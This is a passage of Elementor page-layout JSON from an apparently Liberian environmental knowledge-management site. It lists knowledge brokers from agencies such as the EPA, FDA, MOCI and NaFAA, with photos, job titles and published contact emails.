questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager-CCCD Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br 